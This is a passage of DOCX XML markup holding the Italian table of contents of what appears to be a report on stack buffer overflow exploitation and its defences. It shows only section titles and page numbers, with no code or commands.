        <w:p w14:paraId="51EB765A" w14:textId="732E08FB" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047761" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Macchina virtuale</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047761 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51282C5E" w14:textId="176F20E5" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047762" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Software vulnerabile</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047762 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D3AEB8B" w14:textId="26E60136" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047763" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Debugger</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047763 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="286ADB5C" w14:textId="6FA73A06" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047764" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Mona Modules</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047764 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="266E242D" w14:textId="619A8527" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047765" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Attacco</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047765 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A6E9E53" w14:textId="43E4388A" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047766" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 Setup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047766 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30BCB709" w14:textId="1EAFE02A" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047767" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2 Spiking</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047767 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52C6A8CA" w14:textId="13D8C453" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047768" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.3 Fuzzing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047768 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A462307" w14:textId="66458CE3" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047769" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4 Offset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047769 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FBA8E9F" w14:textId="0F64EB87" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047770" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5 Sovrascrivere l’EIP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047770 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12FE43C1" w14:textId="66787CFD" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047771" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.6 Trovare i “bad characters”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047771 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F79FC5C" w14:textId="17F47D71" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047772" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.7 Trovare il modulo corretto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047772 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45D32692" w14:textId="166F4A01" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047773" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.8 Shellcode e Root!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047773 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="507B7E03" w14:textId="202E90AB" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047774" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.9 Conclusione sull’attacco</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047774 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C9E242A" w14:textId="7148D44B" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047775" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Come difendersi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047775 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49DE2863" w14:textId="435BAE39" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047776" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 Difesa a livello di linguaggio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047776 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AC04297" w14:textId="2453B525" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047777" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Difesa a livello di codice sorgente</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76047777 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CC798E2" w14:textId="6F12FC0D" w:rsidR="003441B6" w:rsidRDefault="003441B6">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76047778" w:history="1">
            <w:r w:rsidRPr="006D3492">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 Difesa a livello di compilatore</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
